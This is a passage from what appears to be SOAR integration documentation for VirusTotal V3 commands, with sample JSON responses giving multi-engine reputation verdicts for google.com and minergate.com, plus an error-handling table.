'last_http_response_content_sha256': '*****', 'last_http_response_code': 200, 'last_final_url': 'https://www.google.com/ ', 'url': 'https://www.google.com/ ', 'last_analysis_stats': {'harmless': 80, 'malicious': 1, 'suspicious': 0, 'undetected': 9, 'timeout': 0}, 'last_analysis_results': {'CMC Threat Intelligence': {'category': 'malicious', 'result': 'phishing', 'method': 'blacklist', 'engine_name': 'CMC Threat Intelligence'}, 'Snort IP sample list': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'Snort IP sample list'}, 'VX Vault': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'VX Vault'}, 'Armis': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'Armis'}, 'Comodo Valkyrie Verdict': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'Comodo Valkyrie Verdict'}, 'PhishLabs': {'category': 'undetected', 'result': 'unrated', 'method': 'blacklist', 'engine_name': 'PhishLabs'}, 'K7AntiVirus': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'K7AntiVirus'}, 'CINS Army': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'CINS Army'}, 'Cyren': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'Cyren'}, 'Quttera': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'Quttera'}, 'BlockList': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'BlockList'}, 'OpenPhish': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'OpenPhish'}, '0xSI_f33d': {'category': 'undetected', 'result': 'unrated', 'method': 'blacklist', 'engine_name': '0xSI_f33d'}, 'Feodo Tracker': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'Feodo Tracker'}, 'Web Security Guard': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'Web Security Guard'}, 'Scantitan': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'Scantitan'}, 'AlienVault': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'AlienVault'}, 'Sophos': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'Sophos'}, 'Phishtank': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'Phishtank'}, 'EonScope': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'EonScope'}, 'Cyan': {'category': 'undetected', 'result': 'unrated', 'method': 'blacklist', 'engine_name': 'Cyan'}, 'Spam404': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'Spam404'}, 'SecureBrain': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'SecureBrain'}, 'Hoplite Industries': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'Hoplite Industries'}, 'CRDF': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'CRDF'}, 'Rising': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'Rising'}, 'StopForumSpam': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'StopForumSpam'}, 'Fortinet': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'Fortinet'}, 'http://alphaMountain.ai ': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'http://alphaMountain.ai '}, 'Lionic': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'Lionic'}, 'Virusdie External Site Scan': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'Virusdie External Site Scan'}, 'Artists Against 419': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'Artists Against 419'}, 'Google Safebrowsing': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'Google Safebrowsing'}, 'SafeToOpen': {'category': 'undetected', 'result': 'unrated', 'method': 'blacklist', 'engine_name': 'SafeToOpen'}, 'ADMINUSLabs': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'ADMINUSLabs'}, 'CyberCrime': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'CyberCrime'}, 'AutoShun': {'category': 'undetected', 'result': 'unrated', 'method': 'blacklist', 'engine_name': 'AutoShun'}, 'Trustwave': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'Trustwave'}, 'AICC (MONITORAPP)': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'AICC (MONITORAPP)'}, 'CyRadar': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'CyRadar'}, 'Dr.Web': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'Dr.Web'}, 'Emsisoft': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'Emsisoft'}, 'Abusix': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'Abusix'}, 'Webroot': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'Webroot'}, 'Avira': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'Avira'}, 'securolytics': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'securolytics'}, 'Antiy-AVL': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'Antiy-AVL'}, 'Quick Heal': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'Quick Heal'}, 'DNS8': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'DNS8'}, 'http://benkow.cc ': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'http://benkow.cc '}, 'EmergingThreats': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'EmergingThreats'}, 'Yandex Safebrowsing': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'Yandex Safebrowsing'}, 'MalwareDomainList': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'MalwareDomainList'}, 'Lumu': {'category': 'undetected', 'result': 'unrated', 'method': 'blacklist', 'engine_name': 'Lumu'}, 'zvelo': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'zvelo'}, 'Kaspersky': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'Kaspersky'}, 'Malware Domain Blocklist': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'Malware Domain Blocklist'}, 'http://desenmascara.me ': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'http://desenmascara.me '}, 'URLhaus': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'URLhaus'}, 'PREBYTES': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'PREBYTES'}, 'Sucuri SiteCheck': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'Sucuri SiteCheck'}, 'Blueliv': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'Blueliv'}, 'Netcraft': {'category': 'undetected', 'result': 'unrated', 'method': 'blacklist', 'engine_name': 'Netcraft'}, 'ZeroCERT': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'ZeroCERT'}, 'Phishing Database': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'Phishing Database'}, 'MalwarePatrol': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'MalwarePatrol'}, 'MalBeacon': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'MalBeacon'}, 'Sangfor': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'Sangfor'}, 'IPsum': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'IPsum'}, 'Spamhaus': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'Spamhaus'}, 'Malwared': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'Malwared'}, 'BitDefender': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'BitDefender'}, 'GreenSnow': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'GreenSnow'}, 'G-Data': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'G-Data'}, 'StopBadware': {'category': 'undetected', 'result': 'unrated', 'method': 'blacklist', 'engine_name': 'StopBadware'}, 'http://SCUMWARE.org ': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'http://SCUMWARE.org '}, 'http://malwares.com URL checker': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'http://malwares.com URL checker'}, 'NotMining': {'category': 'undetected', 'result': 'unrated', 'method': 'blacklist', 'engine_name': 'NotMining'}, 'Forcepoint ThreatSeeker': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'Forcepoint ThreatSeeker'}, 'Certego': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'Certego'}, 'ESET': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'ESET'}, 'Threatsourcing': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'Threatsourcing'}, 'MalSilo': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'MalSilo'}, 'Nucleon': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'Nucleon'}, 'http://BADWARE.INFO ': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'http://BADWARE.INFO '}, 'ThreatHive': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'ThreatHive'}, 'FraudScore': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'FraudScore'}, 'Tencent': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'Tencent'}, 'http://Bfore.Ai PreCrime': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'http://Bfore.Ai PreCrime'}, 'Baidu-International': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'Baidu-International'}}, 'html_meta': {'description': ["Search the world's information, including webpages, images, videos and more. Google has many special features to help you find exactly what you're looking for."], 'robots': ['noodp']}, 'outgoing_links': ['https://www.blogger.com/*****', 'https://www.youtube.com/?gl=US&tab=w1 ']}, 'type': 'url', 'id': '*****', 'links': {'self': 'https://www.virustotal.com/api/v3/urls/*****'}} |
Error Handling
If the Return Data is Partially Successful or Failed, an Error tab will appear in the Test Result window.
The error tab contains the details responded from D3 SOAR or third-party API calls, including Failure Indicator, Status Code, and Message. This can help you locate the root cause of a command failure.
Parts in Error | Description | Example |
Failure Indicator | Indicates the command failure that happened at a specific input and/or API call. | Scan URL failed. |
Status Code | The response code issued by the third-party API server or the D3 SOAR system that can be used to locate the corresponding error category. For example, if the returned status code is 401, the selected connection is unauthorized to run the command. The user or system support would need to check the permission setting in the VirusTotal V3 portal. Refer to the VirusTotal API Errors for details. | Status Code: 404. |
Message | The raw data or captured key error message from the integration API server about the API request failure. | Message: URL Not Found. |
Error Sample Data Scan URL failed. Status Code: 404. Message: URL Not Found. |
Search
Searches domains, IP addresses, file hashes, URLs and tag comments.
Input
Input Parameter | Required/Optional | Description | Example |
Query | Required | The query string to perform an indicator search in VirusTotal. | *****.*****.*** |
Output
The primary response data from the API request.
SAMPLE DATA
{
"data": [
{
"attributes": {
"last_dns_records": [
{
"type": "A",
"value": "***.***.***.***",
"ttl": 30
},
{
"type": "A",
"value": "***.***.***.***",
"ttl": 30
},
{
"type": "CNAME",
"value": "*****.*****.***",
"ttl": 30
},
{
"type": "A",
"value": "***.***.***.***",
"ttl": 30
},
{
"type": "CNAME",
"value": "*****.*****.***",
"ttl": 18
}
],
"jarm": "*****",
"whois": "Admin City: Tempe\nAdmin Country: US\nAdmin Email: *****@*****.***\nAdmin Organization: Domains By Proxy, LLC\nAdmin Postal Code: *****\nAdmin State/Province: Arizona\nCreation Date: 2014-03-04T06:56:24Z\nCreation Date: 2014-03-04T11:56:24Z\nDNSSEC: unsigned\nDomain Name: MINERGATE.COM\nDomain Status: clientDeleteProhibited http://www.icann.org/*****\nDomain Status: clientDeleteProhibited https://icann.org/*****\nDomain Status: clientRenewProhibited http://www.icann.org/*****\nDomain Status: clientRenewProhibited https://icann.org/*****\nDomain Status: clientTransferProhibited http://www.icann.org/*****\nDomain Status: clientTransferProhibited https://icann.org/*****\nDomain Status: clientUpdateProhibited http://www.icann.org/*****\nDomain Status: clientUpdateProhibited https://icann.org/*****\nName Server: NS-1476.AWSDNS-56.ORG\nName Server: NS-1810.AWSDNS-34.CO.UK\nName Server: NS-822.AWSDNS-38.NET\nName Server: NS-97.AWSDNS-12.COM\nRegistrant City: *****\nRegistrant Country: US\nRegistrant Email: *****@*****.***\nRegistrant Fax Ext: *****\nRegistrant Fax: *****\nRegistrant Name: *****\nRegistrant Organization: *****\nRegistrant Phone Ext: *****\nRegistrant Phone: *****\nRegistrant Postal Code: *****\nRegistrant State/Province: *****\nRegistrant Street: *****\nRegistrant Street: *****\nRegistrar Abuse Contact Email: *****@*****.***\nRegistrar Abuse Contact Phone: *****\nRegistrar Abuse Contact Phone: *****\nRegistrar IANA ID: 146\nRegistrar Registration Expiration Date: 2022-03-04T06:56:24Z\nRegistrar URL: http://www.godaddy.com\nRegistrar WHOIS Server: whois.godaddy.com\nRegistrar: GoDaddy.com, LLC\nRegistry Admin ID: Not Available From Registry\nRegistry Domain ID: *****-VRSN\nRegistry Expiry Date: 2022-03-04T11:56:24Z\nRegistry Registrant ID: Not Available From Registry\nRegistry Tech ID: Not Available From Registry\nTech City: Tempe\nTech Country: US\nTech Email: *****@*****.***\nTech Organization: Domains By Proxy, LLC\nTech Postal Code: *****\nTech State/Province: Arizona\nUpdated Date: 2021-02-27T06:33:38Z\nUpdated Date: 2021-02-27T13:33:38Z",
"last_https_certificate_date": 1589470203,
"tags": [],
"popularity_ranks": {
"Cisco Umbrella": {
"timestamp": 1632324968,
"rank": 382288
}
},
"last_dns_records_date": 1632322529,
"last_analysis_stats": {
"harmless": 66,
"malicious": 9,
"suspicious": 1,
"undetected": 10,
"timeout": 0
},
"creation_date": 1393934184,
"reputation": -1,
"registrar": "GoDaddy.com, LLC",
"last_analysis_results": {
"CMC Threat Intelligence": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "CMC Threat Intelligence"
},
"DNS8": {
"category": "malicious",
"result": "malicious",
"method": "blacklist",
"engine_name": "DNS8"
},
"Lionic": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Lionic"
},
"Snort IP sample list": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Snort IP sample list"
},
"AICC (MONITORAPP)": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "AICC (MONITORAPP)"
},
"benkow.cc": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "benkow.cc"
},
"0xSI_f33d": {
"category": "undetected",
"result": "unrated",
"method": "blacklist",
"engine_name": "0xSI_f33d"
},
"securolytics": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "securolytics"
},
"MalwarePatrol": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "MalwarePatrol"
},
"Armis": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Armis"
},
"MalBeacon": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "MalBeacon"
},
"Comodo Valkyrie Verdict": {
"category": "undetected",
"result": "unrated",
"method": "blacklist",
"engine_name": "Comodo Valkyrie Verdict"
},
"PhishLabs": {
"category": "undetected",
"result": "unrated",
"method": "blacklist",
"engine_name": "PhishLabs"
},
"EmergingThreats": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "EmergingThreats"
},
"zvelo": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "zvelo"
},
"CRDF": {
"category": "malicious",
"result": "malicious",
"method": "blacklist",
"engine_name": "CRDF"
},
"K7AntiVirus": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "K7AntiVirus"
},
"Nucleon": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Nucleon"
},
"Virusdie External Site Scan": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Virusdie External Site Scan"
},
"CINS Army": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "CINS Army"
},
"Spamhaus": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Spamhaus"
},
"Quttera": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Quttera"
},
"Yandex Safebrowsing": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Yandex Safebrowsing"
},
"SafeToOpen": {
"category": "undetected",
"result": "unrated",
"method": "blacklist",
"engine_name": "SafeToOpen"
},
"MalwareDomainList": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "MalwareDomainList"
},
"CyberCrime": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "CyberCrime"
},
"Lumu": {
"category": "undetected",
"result": "unrated",
"method": "blacklist",
"engine_name": "Lumu"
},
"Google Safebrowsing": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Google Safebrowsing"
},
"FraudScore": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "FraudScore"
},
"Kaspersky": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Kaspersky"
},
"BitDefender": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "BitDefender"
},
"Emsisoft": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Emsisoft"
},
"GreenSnow": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "GreenSnow"
},
"G-Data": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "G-Data"
},
"Segasec": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Segasec"
},
"OpenPhish": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "OpenPhish"
},
"Sucuri SiteCheck": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Sucuri SiteCheck"
},
"VX Vault": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "VX Vault"
},
"Trustwave": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Trustwave"
},
"Web Security Guard": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Web Security Guard"
},
"CyRadar": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "CyRadar"
},
"desenmascara.me": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "desenmascara.me"
},
"ADMINUSLabs": {
"category": "malicious",
"result": "malicious",
"method": "blacklist",
"engine_name": "ADMINUSLabs"
},
"Scantitan": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Scantitan"
},
"IPsum": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "IPsum"
},
"Dr.Web": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Dr.Web"
},
"AlienVault": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "AlienVault"
},
"Sophos": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Sophos"
},
"malwares.com URL checker": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "malwares.com URL checker"
},
"Abusix": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Abusix"
},
"Phishtank": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Phishtank"
},
"EonScope": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "EonScope"
},
"Malwared": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Malwared"
},
"Avira": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Avira"
},
"NotMining": {
"category": "undetected",
"result": "unrated",
"method": "blacklist",
"engine_name": "NotMining"
},
"Cyan": {
"category": "undetected",
"result": "unrated",
"method": "blacklist",
"engine_name": "Cyan"
},
"Antiy-AVL": {
"category": "malicious",
"result": "malicious",
"method": "blacklist",
"engine_name": "Antiy-AVL"
},
"SCUMWARE.org": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "SCUMWARE.org"
},
"Spam404": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Spam404"
},
"MalSilo": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "MalSilo"
},
"ESTsecurity-Threat Inside": {
"category": "malicious",
"result": "malicious",
"method": "blacklist",
"engine_name": "ESTsecurity-Threat Inside"
},
"Certego": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Certego"
},
"ESET": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "ESET"
},
"Threatsourcing": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Threatsourcing"
},
"URLhaus": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "URLhaus"
},
"SecureBrain": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "SecureBrain"
},
"Webroot": {
"category": "malicious",
"result": "malicious",
"method": "blacklist",
"engine_name": "Webroot"
},
"PREBYTES": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "PREBYTES"
},
"StopForumSpam": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "StopForumSpam"
},
"Blueliv": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Blueliv"
},
"Hoplite Industries": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Hoplite Industries"
},
"Netcraft": {
"category": "undetected",
"result": "unrated",
"method": "blacklist",
"engine_name": "Netcraft"
},
"AutoShun": {
"category": "undetected",
"result": "unrated",
"method": "blacklist",
"engine_name": "AutoShun"
},
"ThreatHive": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "ThreatHive"
},
"BADWARE.INFO": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "BADWARE.INFO"
},
"Forcepoint ThreatSeeker": {
"category": "suspicious",
"result": "suspicious",
"method": "blacklist",
"engine_name": "Forcepoint ThreatSeeker"
},
"Quick Heal": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Quick Heal"
},
"Tencent": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Tencent"
},
"StopBadware": {
"category": "undetected",
"result": "unrated",
"method": "blacklist",
"engine_name": "StopBadware"
},
"Fortinet": {
"category": "malicious",
"result": "malware",
"method": "blacklist",
"engine_name": "Fortinet"
},
"Bfore.Ai PreCrime": {
"category": "malicious",
"result": "malicious",
"method": "blacklist",
"engine_name": "Bfore.Ai PreCrime"
},
"ZeroCERT": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "ZeroCERT"
},
"Baidu-International": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Baidu-International"
},
"Phishing Database": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Phishing Database"
},
"alphaMountain.ai": {
"category": "malicious",
"result": "malicious",
"method": "blacklist",
"engine_name": "alphaMountain.ai"
}
},
"last_update_date": 1614432818,
"last_modification_date": 1632337430,
"last_https_certificate": {
"public_key": {
"rsa": {
"key_size": 2048,
"modulus": "*****",
"exponent": "010001"
},
"algorithm": "RSA"
},
"thumbprint_sha256": "*****",
"tags": [],
"signature_algorithm": "sha256RSA",
"subject": {
"OU": "PositiveSSL Wildcard",
"CN": "*.minergate.com"
},
"validity": {
"not_after": "2020-09-27 23:59:59",
"not_before": "2019-09-25 00:00:00"
},
"version": "V3",
"extensions": {
"certificate_policies": [
"1.3.6.1.4.1.6449.1.2.2.7",
"2.23.140.1.2.1"
],
"extended_key_usage": [
"serverAuth",
"clientAuth"
],
"tags": [],
"subject_alternative_name": [
"*.minergate.com",
"minergate.com"
],
"authority_key_identifier": {
"keyid": "*****"
},
"ca_information_access": {
"CA Issuers": "http://crt.sectigo.com/*****",
"OCSP": "http://ocsp.sectigo.com"
},
"subject_key_identifier": "*****",
"key_usage": [
"ff"
],
"1.3.6.1.4.1.11129.2.4.2": "*****",
"CA": true
},
"cert_signature": {
"signature_algorithm": "sha256RSA",
"signature": "*****"
},
"serial_number": "*****",
"thumbprint": "*****",
"issuer": {
"CN": "Sectigo RSA Domain Validation Secure Server CA",
"C": "GB",
"L": "Salford",
"O": "Sectigo Limited",
"ST": "Greater Manchester"
},
"size": 1538
},
"categories": {
"Sophos": "stocks and trading",
"BitDefender": "financial",
"Webroot": "Malware Sites",
"Comodo Valkyrie Verdict": "media sharing",
"Forcepoint ThreatSeeker": "potentially unwanted software",
"alphaMountain.ai": "Malicious"
},
"total_votes": {
"harmless": 0,
"malicious": 1
}
},
"type": "domain",
"id": "*****.*****.***",
"links": {
"self": "https://www.virustotal.com/api/v3/domains/*****.*****.***"
}
}
],
"links": {
"self": "https://www.virustotal.com/api/v3/search?query=*****.*****.***&"
}
}The data extracted from Raw Data converted into JSON format. Context Data may be identical to Raw Data in some cases.
D3 customizes the Context Data by extracting the data from path $.data in API returned JSON.
It is recommended to refer to the Raw Data instead of Context Data, since it contains the complete API response data. D3 will deprecate Context Data in the future, and playbook tasks using Context Data will be replaced with Raw Data.
SAMPLE DATA
[
{
"attributes": {
"last_dns_records": [
{
"type": "A",
"value": "***.***.***.***",
"ttl": 30
},
{
"type": "A",
"value": "***.***.***.***",
"ttl": 30
},
{
"type": "CNAME",
"value": "*****.*****.***",
"ttl": 30
},
{
"type": "A",
"value": "***.***.***.***",
"ttl": 30
},
{
"type": "CNAME",
"value": "*****.*****.***",
"ttl": 18
}
],
"jarm": "*****",
"whois": "Admin City: Tempe\nAdmin Country: US\nAdmin Email: *****@*****.***\nAdmin Organization: Domains By Proxy, LLC\nAdmin Postal Code: *****\nAdmin State/Province: Arizona\nCreation Date: 2014-03-04T06:56:24Z\nCreation Date: 2014-03-04T11:56:24Z\nDNSSEC: unsigned\nDomain Name: MINERGATE.COM\nDomain Status: clientDeleteProhibited http://www.icann.org/*****\nDomain Status: clientDeleteProhibited https://icann.org/*****\nDomain Status: clientRenewProhibited http://www.icann.org/*****\nDomain Status: clientRenewProhibited https://icann.org/*****\nDomain Status: clientTransferProhibited http://www.icann.org/*****\nDomain Status: clientTransferProhibited https://icann.org/*****\nDomain Status: clientUpdateProhibited http://www.icann.org/*****\nDomain Status: clientUpdateProhibited https://icann.org/*****\nName Server: NS-1476.AWSDNS-56.ORG\nName Server: NS-1810.AWSDNS-34.CO.UK\nName Server: NS-822.AWSDNS-38.NET\nName Server: NS-97.AWSDNS-12.COM\nRegistrant City: *****\nRegistrant Country: US\nRegistrant Email: *****@*****.***\nRegistrant Fax Ext: *****\nRegistrant Fax: *****\nRegistrant Name: *****\nRegistrant Organization: *****\nRegistrant Phone Ext: *****\nRegistrant Phone: *****\nRegistrant Postal Code: *****\nRegistrant State/Province: *****\nRegistrant Street: *****\nRegistrant Street: *****\nRegistrar Abuse Contact Email: *****@*****.***\nRegistrar Abuse Contact Phone: *****\nRegistrar Abuse Contact Phone: *****\nRegistrar IANA ID: 146\nRegistrar Registration Expiration Date: 2022-03-04T06:56:24Z\nRegistrar URL: http://www.godaddy.com\nRegistrar WHOIS Server: whois.godaddy.com\nRegistrar: GoDaddy.com, LLC\nRegistry Admin ID: Not Available From Registry\nRegistry Domain ID: *****-VRSN\nRegistry Expiry Date: 2022-03-04T11:56:24Z\nRegistry Registrant ID: Not Available From Registry\nRegistry Tech ID: Not Available From Registry\nTech City: Tempe\nTech Country: US\nTech Email: *****@*****.***\nTech Organization: Domains By Proxy, LLC\nTech Postal Code: *****\nTech State/Province: Arizona\nUpdated Date: 2021-02-27T06:33:38Z\nUpdated Date: 2021-02-27T13:33:38Z",
"last_https_certificate_date": 1589470203,
"tags": [],
"popularity_ranks": {
"Cisco Umbrella": {
"timestamp": 1632324968,
"rank": 382288
}
},
"last_dns_records_date": 1632322529,
"last_analysis_stats": {
"harmless": 66,
"malicious": 9,
"suspicious": 1,
"undetected": 10,
"timeout": 0
},
"creation_date": 1393934184,
"reputation": -1,
"registrar": "GoDaddy.com, LLC",
"last_analysis_results": {
"CMC Threat Intelligence": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "CMC Threat Intelligence"
},
"DNS8": {
"category": "malicious",
"result": "malicious",
"method": "blacklist",
"engine_name": "DNS8"
},
"Lionic": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Lionic"
},
"Snort IP sample list": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Snort IP sample list"
},
"AICC (MONITORAPP)": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "AICC (MONITORAPP)"
},
"benkow.cc": {
"category": "harmless",
"result": "clean",
